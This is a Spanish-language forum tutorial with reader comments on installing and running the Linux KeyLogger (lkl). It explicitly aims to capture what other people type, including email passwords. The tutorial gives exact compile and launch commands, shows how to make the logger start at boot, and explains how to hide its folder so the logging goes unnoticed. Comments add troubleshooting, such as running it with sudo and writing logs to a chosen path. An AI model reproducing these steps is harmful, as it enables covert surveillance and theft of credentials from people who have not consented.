Patrocinadores

Anuncios Google

Linux KeyLogger

Tutoriales de Linuxmx

Si te haz pasado la vida buscando y buscando por google algún keylogger para Linux, haz llegado al lugar correcto. Linux KeyLogger (lkl) es tu solución, es una de las pocas aplicaciones de este tipo que existen para Linux. Ahora podrás saber todo lo que escriben en tu ordenador cuando tu no estas. Aunque solo esta disponible en modo texto eso no sera problema, pues explicare su instalación, uso, y algunos "truquillos".

Linux KeyLogger, es, como bien lo dice su nombre, un registrador de teclas. Es una aplicación bastante funcional si quieres saber que es lo que escriben en tu ordenador, como por ejemplo, contraseñas de e-mail, el texto que se escribe al chatear, hasta lo que buscas en google, en fin, todas las teclas que sean pulsadas serán almacenadas en un fichero.

A continuación me daré a la tarea de explicar como instalar de un manera relativamente fácil lkl.

Lo primero sera descargarnos el código fuente de la aplicación, después la descomprimimos en una carpeta que podamos ocultar, como por ejemplo nuestra carptea personal. Guardamos ahi el SRC descomprimido con el nombre que viene por defecto "lkl" (sera mas fácil para el procedimiento). Bien, ahora que tenemos el SRC en "/home/Usuario/lkl" procederemos a ubicarnos en este directorio en la terminal con el siguiente comando:

  • cd /home/Usuario/lkl

Seguido de esto, escribiremos:

  • sudo ./configure

Después, para compilar e instalar:

  • sudo make && make install

Hecho lo anterior, ejecutaremos lkl introduciendo el siguiente comando en la terminal:

  • lkl -l -k /home/Usuario/lkl/keymaps/us_km -o LOGS &

Explico el significado de la linea anterior:

  1. -l sera para iniciar la toma de datos 0x60 (Teclado)
  2. -k con esto escogeremos el mapa de teclado a usar, en este caso el de USA, porque el ES no está disponible. Lo siguiente es la ruta donde se encuentran los diferentes keymap's de los cuales dispone Linux Key Logger.
  3. -o LOGS, esto creará el archivo donde se guardara todo lo que tecleemos, LOGS será el nombre del fichero (puedes cambiarlo sin problemas).

Listo, ya tenemos nuestro keylogger funcionando en nuestra distro. Ahora; si quieres que se ejecute al inicio, iremos a Sistema -> Preferencias -> Aplicaciónes al inicio -> Añadir. En el apartado -nombre- pondremos "lkl", en -Orden-; el comando que he puesto un poco antes (lkl -l -k /home/Usuario/lkl/keymaps/us_km -o LOGS &), y en -comentario-, introduciremos, por ejemplo, "keylogger". Quedaría algo así:

Para esconder la carpeta "lkl", simplemente pondremos un punto (.) antes del nombre (.lkl). Cuando queramos revisar el archivo, pulsaremos ctrl + H, y se desocultaran todas las carpetas, abriremos el archivo LOGS y ahí estarán registradas todas teclas que hayamos pulsado.

Eso es todo, cualquier duda que surga, comenta e intentare resolverla.

4.468085
Tu voto: Ninguno Votos totales: 4.5 (47 votos)

Anuncios Google

Comentarios

Opciones de visualización de comentarios

Seleccione la forma que prefiera para mostrar los comentarios y haga clic en «Guardar las opciones» para activar los cambios.
Imagen de Sinh0

Linux Mint Debian

Hola! He instalado el KeyLogger pero no me crea el archivo. He usado el comando del comentario de abajo. Uso Linux Mint Debian.

ayuda por favor

donde veo lo que capta el keylogger? ayuda plz

no tira

no se ejecuta la aplicacion al inicio y si intento ejecutarla en una terminal me dice "Have to be root to perform a iopl()!" alguien sabe como se arregla?

Escribe sudo antes del

Escribe sudo antes del comando para ejecutarlo como administrador.

Imagen de jose-14

ideal

para tener tu ordenador vien controlado

salu2

Imagen de Soy MoLo y que

Amm

Donde esta el keyyloger de winbugs?

Saludos

Imagen de pspgorrister

Oímos tiros y no sabemos de dónde vienen las balas:

Este comentario, tiene toda la pinta de querer ir "malmetiendo" para decir que Windows no tiene Keyloggers. A ver si tenemos claros unos conceptos.

En primer lugar, todo son aplicaciones "normales" luego explico esto más tarde(*), en principio, un keylogger, un gusano, un editor de textos, un virus, no es "ni buena ni mala" aplicación, son sólo un conjunto de instrucciones.

Voy a hablar un poco del keylogger de Linux/UNIX, que es tan viejo como estos mismos. Todas las consolas, tienen un historial de comandos que se guardan en un fichero de texto plano visible por cualquiera que tenga permisos, es una forma de tener "un historial" de los ultimos comandos pulsando la tecla arriba, o de ver que ha estado haciendo alguien en el sistema. Eso es así desde que UNIX es UNIX.

Bien, ahora pasemos al tema de un virus, en el concepto "real" de virus, que la gente llama virus a cualquier cosa, no saben diferenciar un troyano de un virus, o de una cutremacro en VBasic. Un programa que modifica otros ejecutables con un código que a su vez modificará a otros ejecutables, extendiéndose por el sistema como un virus (de ahí su nombre).

Esto, se puede hacer en cualquier SO hasta en el CPM de AMSTRAD de 8 bits. Lo mismo que una rutina que lea las pulsaciones del teclado y las guarde en algún sitio.

La vulnerabilidad no está en eso, si yo hago un virus y con mi usuario lo ejecuto y modifica mis ficheros, pues tampoco es una vulnerablidad, porque si tengo el poder de borrar mis archivos, ¿qué problema hay en que modifique su cabecera y tenga nuevo código?, como si los quiero dejar todos con 8Kb de tamaño, y ponerles extensión .KK. Lo mismo con el Keylogger, incluso Windows tiene un pequeño historial al abrir una ventana MSDOS, es un keylogger básico, pero la esencia está ahí.

(*)Después de todo este rollo, para entrar en ambiente, voy a donde quiero llegar. La vulnerabilidad, no está en ejecutar un keylogger, un virus o un FORMAT C:. La vulnerablidad está en hacer eso SIN TENER PERMISO PARA HACERLO, sea espiando lo que teclea otro usuario, modificando ficheros del sistema, sin supuestamente tener permisos para ello. He ahí la diferencia.

 


LuaDiE: Crea en Lua sin teclear código. Compatible HM7, HMv2, LuaPlayer, LuaDEV y PGE.

Imagen de Soy MoLo y que

Solo preguntaba doonde esta... si esta aqui en SB...

Me durmio tu respuesta... demasiado aburrida... que te cuesta poner un lnk y ya?

Imagino que no te cansaste de escribir, i si si pues no sirvio para nada,

Imagen de pspgorrister

Me durmio tu respuesta. Que

  • Me durmio tu respuesta. Que curioso, a mí me durmió tu pregunta.
  • Imagino que no te cansaste de escribir (...). Imaginas mal. No me cansé. Y tú deberías entrenarte a ello que cada 3 palabras tienes 1 falta de ortografía.
  • (...)i si si pues no sirvio para nada,. Te equivocas otra vez, sirvió para algo, te llevaste un OWNED. Que venías a trollear.

PD: Si no quieres respuestas aburridas, no hagas preguntas de Troll.


LuaDiE: Crea en Lua sin teclear código. Compatible HM7, HMv2, LuaPlayer, LuaDEV y PGE.

Imagen de Fontr3x

Lo siento, pero te has

Lo siento, pero te has llevado un PWNED en toda regla jajaja (me refiero al otro chaval)

Pspgorrister, ¿eres programador a nivel profesional o lo dejas mejor como 'hobby'?


PC:

  • Linux Ubuntu 10.10 Maverick Meerkat x86_64
Consola:
  • Xbox 360 Elite Crystal 120Gb LiteOn 83850cV1 iXtreme LiteTouch 1.1
  • Xbox 360 Arcade White Edition

Imagen de xX_b-bo0y_Xx

woow

es un programa my bello ahh jugar se ahh dicho guajajajaja xD

Imagen de Suigintou

Bastante bueno el programita,

Bastante bueno el programita, solamente una cosa, no encontre el logs que dices.

 

Lo resolvi del siguiente modo

 

sudo lkl -l -k /home/user/lkl/keymaps/us_km -o /home/user/lkl/LOGS.txt &

 

Que pasa con esto, el log del keylogger lo da en la carpeta de lkl.

 

SALUDOS (creo que vi una funcion para mandarlo por correo, me imagino que se pondra en la orden -m abcdefatasdcsd [dot] com aunque en realidad no se)


uNA BasUrA NunCA mE pOdRA GaNAr.

Imagen de P22

Como mola!

Lástima que mi hermano no me deja instalar linux en el ordenador de sobremesa xD

Imagen de -RG4M3R-

uuuuu

Le dire a molo que lo ofendeis xDDDD

Imagen de xX_1loko7_Xx

Pero... dime a mi tu

Pero... dime a mi tu presupuesto en estes momentos que te recomiendo u nportatil barato, muy barato pra ubuntu.

Imagen de P22

Si yo tenía un acer aspire one con ubuntu

pero lo vendí para comprar un mac, y probablemente esta semana me lo compre

Imagen de krl1995

Que suerte.

Que suerte.

PD: Yo soy el de abajo, el de tu coment, solo que estaba en el colegio y tienen keyloggers, y porsiacaso....

Imagen de xX_1loko7_Xx

Muy burno. tendré que

Muy burno. tendré que probarlo.

Opciones de visualización de comentarios

Seleccione la forma que prefiera para mostrar los comentarios y haga clic en «Guardar las opciones» para activar los cambios.